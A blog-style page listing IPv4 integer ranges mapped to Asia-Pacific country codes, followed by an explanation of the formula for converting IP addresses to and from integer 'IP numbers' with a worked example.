3411730432 3411738623 HK HONG KONG
3411738624 3411739647 CN CHINA
3411755008 3411763199 AU AUSTRALIA
3411771392 3411779583 HK HONG KONG
3411795968 3411804159 AU AUSTRALIA
3411804160 3411805183 CN CHINA
3411820544 3411832831 SG SINGAPORE
3411836928 3411845119 MY MALAYSIA
3411853312 3411857407 IN INDIA
3411861504 3411869695 AU AUSTRALIA
3411869696 3411943423 CN CHINA
3411951616 3411967999 LK SRI LANKA
3411968000 3411984383 AU AUSTRALIA
3411984384 3412000767 IN INDIA
3412000768 3412002815 CN CHINA
3412017152 3412025343 SG SINGAPORE
3412033536 3412066303 TW TAIWAN
3412066304 3412213759 NZ NEW ZEALAND
3412213760 3412221951 AU AUSTRALIA
3412230144 3412246527 HK HONG KONG
3412254720 3412262911 NR NAURU
3412262912 3412273151 NZ NEW ZEALAND
3412279296 3412281343 NZ NEW ZEALAND


Labels: 0 comments | | edit post
IP address (IPv4 / IPv6) is divided into 4 sub-blocks. Each sub-block has a different weight number each powered by 256. IP number is being used in the database because it is efficient to search between a range of number in database.

Beginning IP number and Ending IP Number are calculated based on following formula:

IP Number = 16777216*w + 65536*x + 256*y + z (Formula 1)

IP Address = w.x.y.z

For example, if IP address is "", then its IP Number "3401190660" is based on the Formula 1.

IP Address =

So, w = 202, x = 186, y = 13 and z = 4

IP Number = 16777216*202 + 65536*186 + 256*13 + 4
= 3388997632 + 12189696 + 3328 + 4
= 3401190660

To reverse IP number to IP address,

w = int ( IP Number / 16777216 ) % 256
x = int ( IP Number / 65536 ) % 256
y = int ( IP Number / 256 ) % 256
z = int ( IP Number ) % 256

where % is the mod operator and int is return the integer part of the division.
Labels: 0 comments | | edit post